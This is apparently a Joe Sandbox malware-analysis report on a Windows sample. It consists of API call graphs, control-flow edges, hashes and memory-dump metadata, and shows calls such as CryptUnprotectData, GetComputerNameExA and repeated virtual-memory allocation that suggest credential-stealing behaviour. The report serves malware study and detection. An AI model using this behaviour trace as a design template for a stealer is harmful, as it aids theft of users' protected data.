___free_lc_time 7 API calls 15264->15265 15264->15266 15265->15266 15266->15241 15268 40ad49 _raise 15267->15268 15269 40a5b2 15268->15269 15285 40d35c 15268->15285 15271 40a298 15269->15271 15272 40a2a4 ___BuildCatchObject 15271->15272 15273 40ad41 __getptd 4 API calls 15272->15273 15274 40a2a9 15273->15274 15278 40a2bb __setmbcp 15274->15278 15355 40f34e 15274->15355 15276 40d35c __amsg_exit 4 API calls 15277 40a2c9 ___BuildCatchObject 15276->15277 15277->15258 15278->15276 15278->15277 15376 4083ba 15279->15376 15281 40a350 __setmbcp_nolock 15281->15260 15283 40a33c __setmbcp_nolock 7 API calls 15282->15283 15284 40a3d8 _memset setSBCS __setmbcp_nolock 15283->15284 15284->15264 15292 41065d 15285->15292 15289 40d36e 15290 40aaf5 __onexit_nolock 2 API calls 15289->15290 15291 40d379 15290->15291 15291->15269 15319 412904 15292->15319 15295 410671 15297 4104b2 __NMSG_WRITE 4 API calls 15295->15297 15299 40d366 15295->15299 15296 412904 __set_error_mode 2 API calls 15296->15295 15298 410689 15297->15298 15300 4104b2 __NMSG_WRITE 4 API calls 15298->15300 15301 4104b2 15299->15301 15300->15299 15302 4104c6 15301->15302 15303 410621 15302->15303 15304 412904 __set_error_mode 2 API calls 15302->15304 15303->15289 15305 4104e8 15304->15305 15305->15303 15306 412904 __set_error_mode 2 API calls 15305->15306 15307 4104f9 15306->15307 15307->15303 15326 40907c 15307->15326 15309 41052d __invoke_watson __NMSG_WRITE 15310 40907c _strcpy_s 2 API calls 15309->15310 15311 41056f __invoke_watson _strlen 15309->15311 15310->15311 15316 4105b2 __invoke_watson 15311->15316 15330 408ca6 15311->15330 15313 4105d8 __invoke_watson 15315 4102a9 _strcat_s 2 API calls 15313->15315 15317 4105fd __invoke_watson 15315->15317 15334 4102a9 15316->15334 15338 41279b 15317->15338 15320 412913 _write_string 15319->15320 15322 410664 15320->15322 15323 40b271 15320->15323 15322->15295 15322->15296 15324 40aaf5 __onexit_nolock TlsGetValue TlsGetValue 15323->15324 15325 40b281 __setmbcp_nolock 15324->15325 15329 40908d _write_string 15326->15329 15327 40b271 __set_error_mode 2 API calls 15328 4090a8 15327->15328 15328->15309 15329->15327 15329->15328 15333 408cb8 _write_string 15330->15333 15331 408cc1 15331->15316 15332 40b271 __set_error_mode 2 API calls 15332->15331 15333->15331 15333->15332 15335 4102ba _write_string 15334->15335 15336 40b271 __set_error_mode 2 API calls 15335->15336 15337 4102d5 15335->15337 15336->15337 15337->15313 15352 40aaec 15338->15352 15340 4127be 15340->15303 15341 41289b 15343 40aaf5 __onexit_nolock 2 API calls 15341->15343 15346 4128e8 15343->15346 15344 40aaf5 __onexit_nolock 2 API calls 15349 4128b3 15344->15349 15345 40aaf5 __onexit_nolock 2 API calls 15347 412863 15345->15347 15346->15303 15348 40aaf5 __onexit_nolock 2 API calls 15347->15348 15351 412870 15348->15351 15349->15341 15350 40aaf5 __onexit_nolock 2 API calls 15349->15350 15350->15341 15351->15341 15351->15344 15353 40aa7a __onexit_nolock TlsGetValue TlsGetValue 15352->15353 15354 40aaf3 15353->15354 15354->15340 15354->15345 15354->15351 15356 40f363 15355->15356 15357 40f375 15355->15357 15361 40f28b 15356->15361 15357->15278 15359 40f369 15359->15357 15360 40d35c __amsg_exit 4 API calls 15359->15360 15360->15357 15362 40f297 ___BuildCatchObject 15361->15362 15363 41065d __FF_MSGBANNER 4 API calls 15362->15363 15368 40f2b3 _doexit 15362->15368 15365 40f2ac 15363->15365 15364 40d24d __mtinitlocknum 7 API calls 15366 40f2d8 15364->15366 15367 4104b2 __NMSG_WRITE 4 API calls 15365->15367 15369 40f34e _raise 7 API calls 15366->15369 15375 40f2cd ___BuildCatchObject __mtinitlocknum _write_string 15366->15375 15367->15368 15368->15364 15368->15375 15370 40f2f5 15369->15370 15371 40f329 15370->15371 15373 40f2fd ___lock_fhandle 15370->15373 15372 409fe4 ___free_lc_time 7 API calls 15371->15372 15372->15375 15374 409fe4 ___free_lc_time 7 API calls 15373->15374 15373->15375 15374->15375 15375->15359 15377 4083cd 15376->15377 15383 40841a 15376->15383 15378 40ad41 __getptd 4 API calls 15377->15378 15379 4083d2 15378->15379 15380 4083fa 15379->15380 15384 40aa04 15379->15384 15382 40a298 __setmbcp 7 API calls 15380->15382 15380->15383 15382->15383 15383->15281 15385 40aa10 ___BuildCatchObject 15384->15385 15386 40ad41 __getptd 4 API calls 15385->15386 15387 40aa15 15386->15387 15388 40aa43 15387->15388 15390 40aa27 15387->15390 15389 40f34e _raise 7 API calls 15388->15389 15391 40aa4a 15389->15391 15392 40ad41 __getptd 4 API calls 15390->15392 15397 40a9c6 15391->15397 15394 40aa2c _LocaleUpdate::_LocaleUpdate 15392->15394 15395 40aa3a ___BuildCatchObject 15394->15395 15396 40d35c __amsg_exit 4 API calls 15394->15396 15395->15380 15396->15395 15398 40a9fc 15397->15398 15399 40a9ca _LocaleUpdate::_LocaleUpdate __freefls@4 15397->15399 15398->15394 15399->15398 15401 40a755 15399->15401 15402 40a7d9 15401->15402 15404 40a76c 15401->15404 15403 40a826 15402->15403 15405 409fe4 ___free_lc_time 7 API calls 15402->15405 15407 410041 ___free_lc_time 7 API calls 15403->15407 15417 40a84d 15403->15417 15404->15402 15406 40a7a0 15404->15406 15413 409fe4 ___free_lc_time 7 API calls 15404->15413 15408 40a7fa 15405->15408 15410 40a7c1 15406->15410 15421 409fe4 ___free_lc_time 7 API calls 15406->15421 15409 40a846 15407->15409 15411 409fe4 ___free_lc_time 7 API calls 15408->15411 15414 409fe4 ___free_lc_time 7 API calls 15409->15414 15412 409fe4 ___free_lc_time 7 API calls 15410->15412 15416 40a80d 15411->15416 15418 40a7ce 15412->15418 15419 40a795 15413->15419 15414->15417 15415 40a892 15420 409fe4 ___free_lc_time 7 API calls 15415->15420 15423 409fe4 ___free_lc_time 7 API calls 15416->15423 15417->15415 15422 409fe4 7 API calls ___free_lc_time 15417->15422 15424 409fe4 ___free_lc_time 7 API calls 15418->15424 15425 41021b ___free_lconv_mon 7 API calls 15419->15425 15426 40a898 15420->15426 15427 40a7b6 15421->15427 15422->15417 15428 40a81b 15423->15428 15424->15402 15425->15406 15426->15398 15429 4101d6 ___free_lconv_num 7 API calls 15427->15429 15430 409fe4 ___free_lc_time 7 API calls 15428->15430 15429->15410 15430->15403 15434 4125c1 15431->15434 15435 4083ba _LocaleUpdate::_LocaleUpdate 7 API calls 15434->15435 15436 4125d4 15435->15436 15436->15245 15438 40b562 15437->15438 15444 40b4c1 _doexit 15437->15444 15439 40b588 _realloc 2 API calls 15438->15439 15446 40b54e _write_string 15439->15446 15440 41065d __FF_MSGBANNER 4 API calls 15440->15444 15442 4104b2 __NMSG_WRITE 4 API calls 15442->15444 15443 40b51e RtlAllocateHeap 15443->15444 15444->15440 15444->15442 15444->15443 15444->15446 15447 40b460 15444->15447 15453 40b588 15444->15453 15446->15251 15448 40b46c ___BuildCatchObject 15447->15448 15449 40f34e _raise 7 API calls 15448->15449 15450 40b48d ___BuildCatchObject _malloc 15448->15450 15451 40b482 15449->15451 15450->15444 15456 40fb60 15451->15456 15454 40aaf5 __onexit_nolock 2 API calls 15453->15454 15455 40b598 15454->15455 15455->15444 15457 40fb8e 15456->15457 15458 40fc27 ___sbh_alloc_block 15457->15458 15460 40f6c7 15457->15460 15458->15450 15461 40f6da 15460->15461 15462 40f70e RtlAllocateHeap 15460->15462 15461->15458 15463 40f6f8 15462->15463 15463->15458 15465 411903 15464->15465 15467 41191b 15465->15467 15471 40aa7a TlsGetValue 15465->15471 15467->15195 15475 40b40d 15468->15475 15470 40b456 15470->15197 15472 40aa92 15471->15472 15474 40aaa7 15471->15474 15473 40aa9c TlsGetValue 15472->15473 15472->15474 15473->15474 15474->15465 15476 40b419 ___BuildCatchObject 15475->15476 15481 40d3c8 15476->15481 15480 40b42a __cinit ___BuildCatchObject 15480->15470 15482 40f34e _raise 7 API calls 15481->15482 15483 40b41e 15482->15483 15484 40b322 15483->15484 15485 40aaf5 __onexit_nolock 2 API calls 15484->15485 15486 40b336 15485->15486 15487 40aaf5 __onexit_nolock 2 API calls 15486->15487 15488 40b346 15487->15488 15496 40b3c9 15488->15496 15501 41040f 15488->15501 15490 40aa7a __onexit_nolock 2 API calls 15492 40b3be 15490->15492 15491 40b364 15493 40b388 15491->15493 15500 40b3b0 15491->15500 15508 40d2de 15491->15508 15494 40aa7a __onexit_nolock 2 API calls 15492->15494 15493->15496 15497 40d2de __onexit_nolock 9 API calls 15493->15497 15498 40b39e 15493->15498 15494->15496 15496->15480 15497->15498 15498->15496 15499 40aa7a __onexit_nolock 2 API calls 15498->15499 15499->15500 15500->15490 15502 41041b ___BuildCatchObject 15501->15502 15503 410448 15502->15503 15504 41042b _write_string 15502->15504 15505 40f34e _raise 7 API calls 15503->15505 15507 410440 ___BuildCatchObject __msize ___sbh_find_block 15503->15507 15506 40b271 __set_error_mode 2 API calls 15504->15506 15505->15507 15506->15507 15507->15491 15511 40d2e7 15508->15511 15510 40d326 15510->15493 15511->15510 15512 412107 15511->15512 15513 412113 ___BuildCatchObject 15512->15513 15514 412128 15513->15514 15515 41211a 15513->15515 15517 41213b 15514->15517 15518 41212f 15514->15518 15516 40b4af _malloc 7 API calls 15515->15516 15526 412122 ___BuildCatchObject _realloc _write_string 15516->15526 15523 4122ad 15517->15523 15527 412148 ___sbh_free_block ___sbh_resize_block _realloc ___sbh_find_block 15517->15527 15519 409fe4 ___free_lc_time 7 API calls 15518->15519 15519->15526 15520 4122e0 15522 40b588 _realloc 2 API calls 15520->15522 15521 40f34e _raise 7 API calls 15521->15527 15522->15526 15523->15520 15524 40b588 _realloc 2 API calls 15523->15524 15523->15526 15524->15523 15525 4121d3 RtlAllocateHeap 15525->15527 15526->15511 15527->15520 15527->15521 15527->15525 15527->15526 15528 40fb60 ___sbh_alloc_block RtlAllocateHeap 15527->15528 15529 40cb80 __VEC_memcpy _realloc 15527->15529 15530 40b588 _realloc 2 API calls 15527->15530 15528->15527 15529->15527 15530->15527 15532 40d4ac ___BuildCatchObject 15531->15532 15533 40f34e _raise 7 API calls 15532->15533 15534 40d4b3 15533->15534 15535 40aaf5 __onexit_nolock 2 API calls 15534->15535 15537 40d56c _doexit ___BuildCatchObject __initterm 15534->15537 15536 40d4ea 15535->15536 15536->15537 15538 40aaf5 __onexit_nolock 2 API calls 15536->15538 15537->15204 15541 40d4ff 15538->15541 15539 40aaf5 TlsGetValue TlsGetValue __onexit_nolock 15539->15541 15540 40aaec TlsGetValue TlsGetValue _raise 15540->15541 15541->15537 15541->15539 15541->15540 15543 411ff5 ___BuildCatchObject 15542->15543 15544 41200d _write_string 15543->15544 15551 41202c _memset __calloc_impl 15543->15551 15545 40b271 __set_error_mode 2 API calls 15544->15545 15547 412022 ___BuildCatchObject 15545->15547 15546 41209e RtlAllocateHeap 15546->15551 15547->15212 15548 40b588 _realloc 2 API calls 15548->15551 15549 40f34e _raise 7 API calls 15549->15551 15550 40fb60 ___sbh_alloc_block RtlAllocateHeap 15550->15551 15551->15546 15551->15547 15551->15548 15551->15549 15551->15550 15555 40ad67 ___BuildCatchObject 15552->15555 15553 40ae69 ___BuildCatchObject 15553->15229 15554 40ad7f 15557 40ad8d 15554->15557 15558 409fe4 ___free_lc_time 7 API calls 15554->15558 15555->15553 15555->15554 15556 409fe4 ___free_lc_time 7 API calls 15555->15556 15556->15554 15559 40ad9b 15557->15559 15560 409fe4 ___free_lc_time 7 API calls 15557->15560 15558->15557 15561 40ada9 15559->15561 15562 409fe4 ___free_lc_time 7 API calls 15559->15562 15560->15559 15563 40adb7 15561->15563 15564 409fe4 ___free_lc_time 7 API calls 15561->15564 15562->15561 15565 40adc5 15563->15565 15566 409fe4 ___free_lc_time 7 API calls 15563->15566 15564->15563 15567 40add3 15565->15567 15568 409fe4 ___free_lc_time 7 API calls 15565->15568 15566->15565 15569 40ade4 15567->15569 15570 409fe4 ___free_lc_time 7 API calls 15567->15570 15568->15567 15571 40f34e _raise 7 API calls 15569->15571 15570->15569 15574 40adec 15571->15574 15572 40ae11 __freefls@4 15573 40f34e _raise 7 API calls 15572->15573 15578 40ae25 __freefls@4 15573->15578 15574->15572 15576 409fe4 ___free_lc_time 7 API calls 15574->15576 15575 40ae56 __freefls@4 15577 409fe4 ___free_lc_time 7 API calls 15575->15577 15576->15572 15577->15553 15578->15575 15579 40a755 ___freetlocinfo 7 API calls 15578->15579 15579->15575 15580 3df3ff 15583 3e4a60 15580->15583 15582 3df42a GetVolumeInformationW 14916 3e423d 14917 3e427d 14916->14917 14918 3e42c4 RtlReAllocateHeap 14916->14918 14917->14918 14919 3e42f0 14918->14919 14920 3e31b5 14921 3e323d LoadLibraryW 14920->14921 14922 3e320b 14920->14922 14923 3e3244 14921->14923 14922->14921 14922->14922 14924 3c46b7 14925 3c46bf 14924->14925 14926 3c4704 NtAllocateVirtualMemory 14925->14926 14927 3c478c NtFreeVirtualMemory 14926->14927 15584 3c56f7 15585 3c5701 NtAllocateVirtualMemory 15584->15585 15587 3c5b1d NtFreeVirtualMemory 15585->15587 14928 3e24b2 14929 3e24c0 14928->14929 14932 3e24df NtAllocateVirtualMemory 14928->14932 14931 3e24ec NtAllocateVirtualMemory 14929->14931 14929->14932 14933 3e2575 NtFreeVirtualMemory 14931->14933 14934 3e265d NtFreeVirtualMemory 14932->14934 14933->14932 15592 3c44ed 15593 3c44f6 15592->15593 15594 3e5940 2 API calls 15593->15594 15595 3c4508 15594->15595 15596 3e286a 15597 3e287a 15596->15597 15598 3e28a0 NtClose 15597->15598 15599 3c4f69 15601 3c4f6f 15599->15601 15600 3c51bf CryptUnprotectData 15601->15600 15602 3c176a 15603 3c1770 15602->15603 15608 3c7230 15603->15608 15605 3c1964 15606 3b95e0 RtlExpandEnvironmentStrings 15605->15606 15607 3c196e 15606->15607 15609 3c7250 15608->15609 15609->15609 15610 3c725b RtlExpandEnvironmentStrings 15609->15610 15611 3c727c 15610->15611 15612 3c728b RtlExpandEnvironmentStrings 15611->15612 15613 3e5440 2 API calls 15612->15613 15614 3c72ba 15613->15614 14939 3c3fab 14940 3c3fb7 14939->14940 14981 3ca330 14940->14981 14942 3c3fbd 14943 3b95e0 RtlExpandEnvironmentStrings 14942->14943 14944 3c3fc7 14943->14944 14945 3cadb0 6 API calls 14944->14945 14946 3c3fdc 14945->14946 14947 3b95e0 RtlExpandEnvironmentStrings 14946->14947 14948 3c3fe6 14947->14948 14949 3cafe0 NtAllocateVirtualMemory NtFreeVirtualMemory 14948->14949 14950 3c3ffb 14949->14950 14951 3b95e0 RtlExpandEnvironmentStrings 14950->14951 14952 3c4005 14951->14952 14953 3cd860 NtAllocateVirtualMemory NtFreeVirtualMemory NtAllocateVirtualMemory NtFreeVirtualMemory 14952->14953 14954 3c4023 14953->14954 14955 3cdd40 NtAllocateVirtualMemory NtFreeVirtualMemory NtAllocateVirtualMemory NtFreeVirtualMemory 14954->14955 14956 3c402c 14955->14956 14957 3b95e0 RtlExpandEnvironmentStrings 14956->14957 14958 3c4036 14957->14958 14959 3b95e0 RtlExpandEnvironmentStrings 14958->14959 14960 3c4055 14959->14960 14961 3ca330 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings NtAllocateVirtualMemory NtFreeVirtualMemory 14960->14961 14962 3c411b 14961->14962 14963 3b95e0 RtlExpandEnvironmentStrings 14962->14963 14964 3c4125 14963->14964 14965 3cadb0 6 API calls 14964->14965 14966 3c413a 14965->14966 14967 3b95e0 RtlExpandEnvironmentStrings 14966->14967 14968 3c4144 14967->14968 14969 3cafe0 NtAllocateVirtualMemory NtFreeVirtualMemory 14968->14969 14970 3c4159 14969->14970 14971 3b95e0 RtlExpandEnvironmentStrings 14970->14971 14972 3c4163 14971->14972 14973 3cd860 NtAllocateVirtualMemory NtFreeVirtualMemory NtAllocateVirtualMemory NtFreeVirtualMemory 14972->14973 14974 3c4181 14973->14974 14975 3cdd40 NtAllocateVirtualMemory NtFreeVirtualMemory NtAllocateVirtualMemory NtFreeVirtualMemory 14974->14975 14976 3c418a 14975->14976 14977 3b95e0 RtlExpandEnvironmentStrings 14976->14977 14978 3c4194 14977->14978 14979 3b95e0 RtlExpandEnvironmentStrings 14978->14979 14980 3c41b3 14979->14980 14982 3ca409 RtlExpandEnvironmentStrings 14981->14982 14983 3ca3b6 14981->14983 14984 3ca454 14982->14984 14983->14982 14985 3ca464 RtlExpandEnvironmentStrings 14984->14985 14986 3ca4d4 14985->14986 14989 3e5440 14986->14989 14988 3ca5f2 14990 3e5450 14989->14990 14991 3e554f 14990->14991 14992 3e5554 NtAllocateVirtualMemory 14990->14992 14991->14988 14993 3e5610 NtFreeVirtualMemory 14992->14993 14993->14991 15615 3d6265 15616 3d6373 15615->15616 15617 3d63d8 SysAllocString 15616->15617 15618 3d643b 15617->15618 15619 3c5f60 15620 3c5f96 15619->15620 15631 3c4380 15620->15631 15622 3c5fec 15623 3c4380 NtAllocateVirtualMemory NtFreeVirtualMemory 15622->15623 15624 3c60a4 15623->15624 15625 3c4380 NtAllocateVirtualMemory NtFreeVirtualMemory 15624->15625 15626 3c6167 15625->15626 15627 3c4380 NtAllocateVirtualMemory NtFreeVirtualMemory 15626->15627 15628 3c6201 15627->15628 15629 3e5640 NtAllocateVirtualMemory NtFreeVirtualMemory 15628->15629 15630 3c646c 15629->15630 15632 3c43a0 15631->15632 15632->15632 15633 3e5440 2 API calls 15632->15633 15634 3c447b 15633->15634 15635 3d12e2 15636 3d12ec 15635->15636 15636->15636 15637 3d157e GetComputerNameExA 15636->15637 15639 3d15e6 15637->15639 15638 3d166b GetComputerNameExA 15640 3d16c7 15638->15640 15639->15638 15639->15639 14994 3c4a1e 14997 3e5810 14994->14997 14998 3e5832 14997->14998 14999 3c4a31 14997->14999 14998->14999 15000 3e5854 NtAllocateVirtualMemory 14998->15000 15001 3e58f2 NtFreeVirtualMemory 15000->15001 15001->14999 15002 3e349a 15003 3e34aa 15002->15003 15004 3e3630 LoadLibraryW 15003->15004 15005 3e3637 15004->15005 15010 3e3396 15011 3e33f8 15010->15011 15012 3e3429 LoadLibraryW 15010->15012 15011->15012 15013 3e3433 15012->15013 15014 3d3216 15015 3d3259 15014->15015 15022 3df2f0 15015->15022 15023 3df3ac RtlExpandEnvironmentStrings 15022->15023 15024 3df36e 15022->15024 15024->15023 15641 3e2c52 15642 3e2c19 15641->15642 15643 3e2c34 NtFreeVirtualMemory 15642->15643 15644 3e2c6d 15642->15644 15645 3c7950 15646 3c79a0 15645->15646 15647 3c795e 15645->15647 15647->15646 15649 3c7520 15647->15649 15650 3c7570 15649->15650 15651 3c4380 2 API calls 15650->15651 15652 3c75bb 15651->15652 15653 3c4380 2 API calls 15652->15653 15654 3c7673 15653->15654 15655 3c4380 2 API calls 15654->15655 15656 3c7739 15655->15656 15657 3c4380 2 API calls 15656->15657 15658 3c77f2 15657->15658 15659 3c4380 2 API calls 15658->15659 15660 3c7892 15659->15660 15661 3c4380 2 API calls 15660->15661 15662 3c7941 15661->15662 15662->15646 15030 3c5a0c 15031 3c5a1c 15030->15031 15034 3e5940 15031->15034 15035 3e5959 15034->15035 15038 3c5a36 15034->15038 15036 3e5993 NtAllocateVirtualMemory 15035->15036 15035->15038 15037 3e5a38 NtFreeVirtualMemory 15036->15037 15037->15038 15039 3c390e 15040 3c3914 15039->15040 15045 3b95e0 15040->15045 15042 3c391f 15049 3b22b0 15042->15049 15046 3b95f9 15045->15046 15048 3b96b8 15045->15048 15047 3df2f0 RtlExpandEnvironmentStrings 15046->15047 15047->15048 15048->15042 15050 3b23c7 15049->15050 15051 3b22be 15049->15051 15052 3b238e 15051->15052 15053 3b22d3 15051->15053 15057 3b2361 15051->15057 15054 3b22b0 RtlFreeHeap 15052->15054 15052->15057 15053->15050 15055 3b22b0 RtlFreeHeap 15053->15055 15056 3b2313 15053->15056 15054->15052 15055->15053 15060 3e0ebb 15056->15060 15059 3e0ebb RtlFreeHeap 15057->15059 15059->15050 15061 3e0f3f RtlFreeHeap 15060->15061 15062 3e0ef1 15060->15062 15062->15061 15663 3c88cf 15664 3c88df 15663->15664 15667 3c9080 15664->15667 15665 3c8955 15668 3c9096 15667->15668 15672 3c9140 15667->15672 15668->15668 15669 3e5440 2 API calls 15668->15669 15668->15672 15670 3c921f 15669->15670 15671 3e5940 2 API calls 15670->15671 15670->15672 15675 3c9243 15671->15675 15672->15665 15673 3c9344 NtAllocateVirtualMemory 15674 3c93d9 NtFreeVirtualMemory 15673->15674 15674->15672 15675->15672 15675->15673 15676 3c6749 15677 3c4380 2 API calls 15676->15677 15678 3c6755 15677->15678 15063 3dae8b KiUserCallbackDispatcher 15064 3daea0 15063->15064 15679 3c144a 15680 3c1459 15679->15680 15685 3c4810 15680->15685 15682 3c1488 15683 3b95e0 RtlExpandEnvironmentStrings 15682->15683 15684 3c1495 15683->15684 15686 3c4830 15685->15686 15686->15686 15687 3c483b RtlExpandEnvironmentStrings 15686->15687 15688 3c485e 15687->15688 15689 3c486e RtlExpandEnvironmentStrings 15688->15689 15690 3c48ec 15689->15690 15691 3e5440 2 API calls 15690->15691 15692 3c49ff 15691->15692 15693 3ccf46 15694 3cd0cf 15693->15694 15707 3e5bd0 15694->15707 15696 3cd11b 15699 3e6060 NtAllocateVirtualMemory NtFreeVirtualMemory NtAllocateVirtualMemory NtFreeVirtualMemory 15696->15699 15704 3cd186 15696->15704 15697 3cd4ba NtAllocateVirtualMemory 15702 3cd55d NtFreeVirtualMemory 15697->15702 15698 3cd5a0 15699->15696 15701 3e5bd0 2 API calls 15701->15704 15702->15704 15704->15697 15704->15698 15704->15701 15705 3cd3af NtAllocateVirtualMemory 15704->15705 15712 3e5d40 15704->15712 15720 3e67d0 15704->15720 15706 3cd436 NtFreeVirtualMemory 15705->15706 15706->15698 15706->15704 15709 3e5bf0 15707->15709 15708 3e5c6f 15708->15696 15709->15708 15710 3e5c74 NtAllocateVirtualMemory 15709->15710 15711 3e5d0c NtFreeVirtualMemory 15710->15711 15711->15708 15713 3e5d59 15712->15713 15715 3e5d7f 15712->15715 15714 3e5d84 NtAllocateVirtualMemory 15713->15714 15713->15715 15716 3e5e2c NtFreeVirtualMemory 15714->15716 15715->15704 15716->15715 15717 3e5e55 15716->15717 15717->15715 15718 3e5ea4 NtAllocateVirtualMemory 15717->15718 15719 3e5f50 NtFreeVirtualMemory 15718->15719 15719->15715 15721 3e67f0 15720->15721 15722 3e6864 NtAllocateVirtualMemory 15721->15722 15727 3e685f 15721->15727 15723 3e690f NtFreeVirtualMemory 15722->15723 15724 3e6938 15723->15724 15723->15727 15725 3e6984 NtAllocateVirtualMemory 15724->15725 15724->15727 15726 3e6a2e NtFreeVirtualMemory 15725->15726 15726->15727 15727->15704 15086 3c4280 15087 3c429a 15086->15087 15088 3c42bb 15086->15088 15087->15088 15089 3c42c0 NtAllocateVirtualMemory 15087->15089 15090 3c434e NtFreeVirtualMemory 15089->15090 15090->15088

                    Executed Functions

                    Function 003CCF46 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 436COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 155 3ccf46-3cd0cd 156 3cd0cf 155->156 157 3cd106-3cd121 call 3e5bd0 155->157 158 3cd0d0-3cd104 156->158 161 3cd128 157->161 162 3cd4a4-3cd4b3 157->162 163 3cd150-3cd16a call 3e6060 157->163 164 3cd131-3cd14f call 3e6060 157->164 165 3cd173-3cd17f 157->165 158->157 158->158 161->164 166 3cd25c-3cd265 162->166 167 3cd21c-3cd225 call 3e5d40 162->167 168 3cd33d-3cd347 162->168 169 3cd1fe 162->169 170 3cd5b9-3cd5c0 162->170 171 3cd239-3cd255 call 3e5bd0 162->171 172 3cd4ba-3cd573 NtAllocateVirtualMemory NtFreeVirtualMemory 162->172 173 3cd33b 162->173 174 3cd5d7-3cd5df 162->174 175 3cd270-3cd2d9 162->175 176 3cd1d0-3cd1d9 162->176 177 3cd210-3cd213 162->177 178 3cd5c9-3cd5d0 162->178 179 3cd5a6-3cd5b2 162->179 180 3cd186-3cd1a1 call 3e41f0 162->180 181 3cd5c7 162->181 182 3cd5e0 162->182 183 3cd5a0 162->183 184 3cd1e0-3cd1f6 call 3b8520 162->184 185 3cd5e2-3cd5ea 162->185 186 3cd462-3cd47c 162->186 163->165 164->163 165->161 165->162 165->163 165->164 165->165 165->180 166->166 166->167 166->168 166->169 166->170 166->171 166->173 166->174 166->175 166->176 166->177 166->178 166->179 166->181 166->182 166->183 166->184 166->185 166->186 191 3cd5f1-3cd5f6 166->191 203 3cd22a-3cd232 167->203 195 3cd349-3cd34f 168->195 196 3cd361-3cd374 168->196 169->177 170->174 170->181 170->182 170->185 170->191 171->166 171->168 171->170 171->173 171->174 171->175 171->178 171->179 171->181 171->182 171->183 171->185 171->191 200 3cd579-3cd58b call 3e5400 172->200 173->168 174->182 192 3cd2db 175->192 193 3cd313-3cd324 call 3e67d0 175->193 176->166 176->167 176->168 176->169 176->170 176->171 176->173 176->175 176->176 176->177 176->179 176->183 176->184 176->186 177->167 178->174 178->181 178->182 178->185 178->191 179->170 179->174 179->178 179->181 179->182 179->185 179->191 211 3cd1a6-3cd1bc 180->211 181->178 184->169 185->166 185->168 185->170 185->171 185->173 185->174 185->175 185->178 185->179 185->181 185->182 185->183 185->185 185->191 186->200 201 3cd482-3cd48f 186->201 206 3cd2e0-3cd311 192->206 215 3cd329-3cd334 193->215 208 3cd350-3cd35f 195->208 209 3cd39f-3cd3a8 196->209 210 3cd376-3cd381 196->210 200->170 200->174 200->178 200->179 200->181 200->182 200->183 200->185 200->191 213 3cd490-3cd497 201->213 203->166 203->168 203->170 203->171 203->173 203->174 203->175 203->176 203->178 203->179 203->181 203->182 203->183 203->185 203->191 206->193 206->206 208->196 208->208 209->166 209->167 209->168 209->169 209->170 209->171 209->173 209->174 209->175 209->176 209->177 209->178 209->179 209->181 209->182 209->183 209->184 209->185 209->186 209->191 217 3cd3af-3cd45b NtAllocateVirtualMemory NtFreeVirtualMemory 209->217 216 3cd390-3cd397 210->216 211->166 211->167 211->168 211->169 211->171 211->173 211->175 211->176 211->177 211->184 211->186 213->172 218 3cd499-3cd49d 213->218 215->168 215->170 215->173 215->174 215->178 215->179 215->181 215->182 215->183 215->185 215->191 216->217 219 3cd399-3cd39d 216->219 217->166 217->167 217->168 217->169 217->170 217->171 217->173 217->174 217->175 217->176 217->177 217->178 217->179 217->181 217->182 217->183 217->184 217->185 217->186 217->191 218->213 220 3cd49f 218->220 219->209 219->216 220->200
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1462719845.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.1462696900.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462760099.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462790296.00000000003EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462861960.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1462891701.0000000000420000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1463454844.0000000000C9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_LisectAVT_2403002A_236.jbxd
                    Similarity
                    • API ID: MemoryVirtual$AllocateFree
                    • String ID: E$J%$JQ$[Q$)+$57$=?
                    • API String ID: 292159236-1103543027
                    • Opcode ID: 9b887c1be7cbd7906656fe8b030c69f6047bd493107a8fcca087efcd1c7b91a7
                    • Instruction ID: 163ee22abbe90403263fce0c73cb576aa1d90ac2335996cf55a03ce748e2e86d
                    • Opcode Fuzzy Hash: 9b887c1be7cbd7906656fe8b030c69f6047bd493107a8fcca087efcd1c7b91a7
                    • Instruction Fuzzy Hash: E10263B1110B41CFE335CF25D885B66B7E8FB05304F548A2CE6AB8BAA0DB75B845CB50
                    Function 003B95E0 Relevance: 17.9, Strings: 14, Instructions: 422COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 222 3b95e0-3b95f3 223 3b95f9-3b9605 222->223 224 3b9ca5-3b9cac 222->224 225 3b9607-3b9609 223->225 226 3b9635-3b9642 223->226 227 3b960b-3b9633 225->227 228 3b9644-3b964b 225->228 229 3b968f-3b9707 call 3b64f0 call 3df2f0 call 3b8550 226->229 230 3b964d-3b9662 227->230 228->230 231 3b9664-3b968a 228->231 238 3b9709 229->238 239 3b9742-3b9796 call 3b8ec0 229->239 230->229 231->229 240 3b9710-3b9740 238->240 243 3b9798 239->243 244 3b97cc-3b981a call 3b8ec0 239->244 240->239 240->240 245 3b97a0-3b97ca 243->245 248 3b9859-3b98b0 call 3b8ec0 244->248 249 3b981c-3b981f 244->249 245->244 245->245 253 3b9902-3b993e 248->253 254 3b98b2 248->254 251 3b9820-3b9857 249->251 251->248 251->251 256 3b9940-3b9985 253->256 257 3b9987-3b99d8 call 3b8ec0 253->257 255 3b98c0-3b9900 254->255 255->253 255->255 256->256 256->257 260 3b99da 257->260 261 3b9a18-3b9ba9 call 3b91b0 257->261 262 3b99e0-3b9a16 260->262 265 3b9bab 261->265 266 3b9be3-3b9c2e 261->266 262->261 262->262 269 3b9bb0-3b9be1 265->269 267 3b9c78-3b9c96 call 3bddd0 call 3b8560 266->267 268 3b9c30-3b9c76 266->268 273 